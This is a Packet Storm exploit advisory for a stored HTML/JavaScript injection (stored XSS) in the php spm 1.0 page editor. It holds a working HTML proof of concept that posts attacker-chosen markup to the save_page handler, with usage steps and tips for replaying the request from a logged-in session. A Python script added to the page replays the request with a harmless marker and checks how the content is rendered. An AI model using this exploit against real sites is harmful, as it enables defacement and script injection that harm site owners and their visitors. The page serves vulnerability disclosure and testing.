## https://sploitus.com/exploit?id=PACKETSTORM:181829
=============================================================================================================================================
| # Title : php spm 1.0 WYSIWYG code injection vulnerability |
| # Author : indoushka |
| # Tested on : Windows 10 Pro (French) / browser : Mozilla Firefox 130.0.0 (64-bit) |
| # Vendor : https://www.kashipara.com/project/download/project2/user/2023/202305/kashipara.com_php-spms-zip.zip |
=============================================================================================================================================
PoC :
[+] The payload stores HTML of your choice in the Welcome or About page. The content is typed into TinyMCE 7.3.0, the WYSIWYG editor the application uses, and submitted to /php-spms/classes/Master.php?f=save_page, which stores it. Because the application renders the stored content as HTML (that is what a WYSIWYG page editor is for), any markup that survives the save, script tags and event handlers included, is served to every visitor of that page: a persistent HTML/JavaScript injection (stored XSS).
[+] Target : edit the URL in the xhr.open('POST', ...) call near the end of the script. It points at http://localhost/php-spms/ by default.
[+] Payload : put your content in the <textarea name="page[welcome]"> element. The field name selects the page: page[welcome] or page[about].
[+] Save the file as poc.html, open it in the browser and press Update.
[+] Caveat : opened from disk, poc.html is a cross-origin page. The XMLHttpRequest does not set withCredentials, so the browser sends no session cookie, and unless the server returns CORS headers the response cannot be read, so the toast may report an error even when the page was updated. If save_page requires a logged-in session, serve poc.html from the application's origin or replay the POST from an authenticated session (for example with a proxy).
[+] payload :
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Welcome Page Editor</title>
  <!-- TinyMCE 7 from the Tiny Cloud CDN, the same editor family the target uses -->
  <script src="https://cdn.tiny.cloud/1/dsrqgwhljvccmtuu414smiyefdarsp88j5fxk0uks60iek04/tinymce/7/tinymce.min.js" referrerpolicy="origin"></script>
</head>
<body>
  <main id="main" class="main">
    <div class="pagetitle">
      <h1>Welcome Page</h1>
      <nav>
        <ol class="breadcrumb">
          <li class="breadcrumb-item active">Welcome Page</li>
        </ol>
      </nav>
    </div>
    <div id="msg-container"></div>
    <div class="card rounded-0">
      <div class="card-body rounded-0 pt-4">
        <div class="container-fluid">
          <form id="page-form">
            <!-- The field name selects the target page: page[welcome] or page[about].
                 Whatever ends up in this textarea is what save_page stores. -->
            <textarea name="page[welcome]" cols="30" rows="10" class="form-control tinymce-editor" required>Hacked By indoushka ;</textarea>
          </form>
        </div>
      </div>
      <div class="card-footer">
        <div class="col-lg-4 col-md-5 col-sm-10 col-12 mx-auto">
          <button class="btn btn-block w-100 btn-primary" form="page-form">Update</button>
        </div>
      </div>
    </div>
    <div id="loader" style="display:none;">Loading...</div>
    <div id="toast"></div>
    <script>
      // Initialize TinyMCE on the textarea. Plugin names are the TinyMCE 7 ones
      // (the old 'paste' and 'print' plugins no longer exist and 'formatselect'
      // is now 'blocks'); the 'code' plugin gives a raw-HTML view for pasting markup.
      tinymce.init({
        selector: 'textarea.tinymce-editor',
        height: 300,
        menubar: false,
        plugins: [
          'advlist', 'autolink', 'lists', 'link', 'image', 'charmap', 'preview', 'anchor',
          'searchreplace', 'visualblocks', 'code', 'fullscreen',
          'insertdatetime', 'media', 'table', 'help', 'wordcount'
        ],
        toolbar: 'undo redo | blocks | bold italic backcolor | ' +
                 'alignleft aligncenter alignright alignjustify | ' +
                 'bullist numlist outdent indent | removeformat | code | help'
      });

      // Loader helpers
      function start_loader() {
        document.getElementById('loader').style.display = 'block';
      }
      function end_loader() {
        document.getElementById('loader').style.display = 'none';
      }

      // Toast helper: shows a message for three seconds
      function showMessage(message, type) {
        const messageDiv = document.getElementById('toast');
        messageDiv.innerHTML = `<div class="alert alert-${type}">${message}</div>`;
        setTimeout(() => {
          messageDiv.innerHTML = '';
        }, 3000);
      }

      // Form submit: POST the editor content to the save_page handler
      document.getElementById('page-form').addEventListener('submit', function(e) {
        e.preventDefault(); // Prevent page reload
        start_loader();
        // Copy the editor content back into the textarea first; otherwise
        // FormData may pick up the initial textarea value instead of what was edited.
        tinymce.triggerSave();
        const formData = new FormData(this); // multipart/form-data with page[welcome]
        const xhr = new XMLHttpRequest();
        // Target: change the host/path to point at your installation
        xhr.open('POST', 'http://localhost/php-spms/classes/Master.php?f=save_page', true);
        xhr.onreadystatechange = function() {
          if (xhr.readyState === XMLHttpRequest.DONE) {
            end_loader();
            if (xhr.status === 200) {
              // The handler answers with JSON such as {"status":"success"}; a
              // non-JSON body (PHP warning, login page) must not crash the handler.
              let response;
              try {
                response = JSON.parse(xhr.responseText);
              } catch (err) {
                showMessage('Unexpected response: ' + xhr.responseText.slice(0, 200), 'error');
                return;
              }
              if (response.status === 'success') {
                showMessage('Page updated successfully!', 'success');
                location.reload(); // Reload the page if successful
              } else if (response.status === 'failed' && response.msg) {
                showMessage(response.msg, 'error');
              } else {
                showMessage('An unknown error occurred.', 'error');
              }
            } else {
              // Status 0 here usually means the cross-origin response was blocked
              // by the browser (no CORS headers), not that the POST was not sent.
              showMessage('Error: ' + (xhr.statusText || 'no readable response (status ' + xhr.status + ')'), 'error');
            }
          }
        };
        xhr.send(formData);
      });
    </script>
  </main>
</body>
</html>
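The same save_page request can be replayed without a browser, which also sidesteps the cross-origin cookie and CORS problems of the HTML PoC, and the result can be checked against the rendered page instead of trusting the JSON reply. The script below is an added example written for this advisory; it is not part of the original PoC and not code from the application. It assumes only what the PoC shows (the save_page URL and the page[welcome] / page[about] field names). The advisory does not name the URL that displays the saved page, so that is a required argument rather than a guess, and the session cookie, if the handler needs one, is passed explicitly. It uses a script element whose body is only a comment as the marker, so it is unique and easy to find but executes nothing.

```python
"""Replay the Master.php?f=save_page request from the PoC and classify how the
stored content comes back on the rendered page (raw, HTML-escaped, stripped).
Added example for this advisory; not code from the original PoC or the
application. Assumptions are marked in comments."""
import argparse
import html
import json
import secrets
import urllib.parse
import urllib.request

SAVE_PATH = "/php-spms/classes/Master.php?f=save_page"  # from the PoC


def build_marker(token=None):
    """Return (token, marker). The marker is a script element whose body is a
    comment only: unique and easy to find, but it runs nothing when rendered."""
    token = token or secrets.token_hex(8)
    return token, "<script>/*spms-" + token + "*/</script>"


def build_save_request(base_url, page, content):
    """URL and url-encoded body for save_page. `page` is the textarea name
    from the PoC: welcome or about. The PoC posts multipart/form-data;
    PHP fills $_POST['page'][...] identically from urlencoded data (assumption:
    the handler reads $_POST, which the PoC's field names imply)."""
    if page not in ("welcome", "about"):
        raise ValueError("page must be 'welcome' or 'about'")
    url = base_url.rstrip("/") + SAVE_PATH
    body = urllib.parse.urlencode({"page[" + page + "]": content}).encode()
    return url, body


def parse_save_response(text):
    """Status field of the JSON reply the PoC expects ('success' / 'failed');
    'unknown' if the field is missing, 'unparseable' if the body is not JSON."""
    try:
        return json.loads(text).get("status", "unknown")
    except (ValueError, AttributeError):
        return "unparseable"


def classify_storage(rendered_html, token):
    """How the saved content reaches the rendered page:
    raw      marker present byte-for-byte: stored HTML is rendered, injection works
    encoded  marker present only HTML-escaped: output encoding is in place
    stripped token present but the script element was removed or altered
    absent   content not on this page (wrong page, save failed, ...)"""
    _, marker = build_marker(token)
    if marker in rendered_html:
        return "raw"
    if html.escape(marker, quote=False) in rendered_html:
        return "encoded"
    if token in rendered_html:
        return "stripped"
    return "absent"


def main():
    ap = argparse.ArgumentParser(description=__doc__)
    ap.add_argument("--base-url", default="http://localhost",
                    help="host serving /php-spms (the PoC default)")
    ap.add_argument("--page", choices=("welcome", "about"), default="welcome")
    ap.add_argument("--render-url", required=True,
                    help="public URL that displays the chosen page (not given in the advisory)")
    ap.add_argument("--cookie", default="",
                    help="session cookie, if save_page requires a login")
    args = ap.parse_args()

    token, marker = build_marker()
    url, body = build_save_request(args.base_url, args.page, marker)
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    if args.cookie:
        headers["Cookie"] = args.cookie
    req = urllib.request.Request(url, data=body, headers=headers)  # data= makes it a POST
    with urllib.request.urlopen(req) as resp:
        print("save_page:", parse_save_response(resp.read().decode(errors="replace")))

    view_headers = {"Cookie": args.cookie} if args.cookie else {}
    with urllib.request.urlopen(urllib.request.Request(args.render_url, headers=view_headers)) as resp:
        print("rendered page:", classify_storage(resp.read().decode(errors="replace"), token))


if __name__ == "__main__":
    main()
```

A "raw" verdict confirms the injection end to end; "encoded" or "stripped" means the save succeeded but the application neutralises the markup, so the JSON status alone would have overstated the impact.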
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================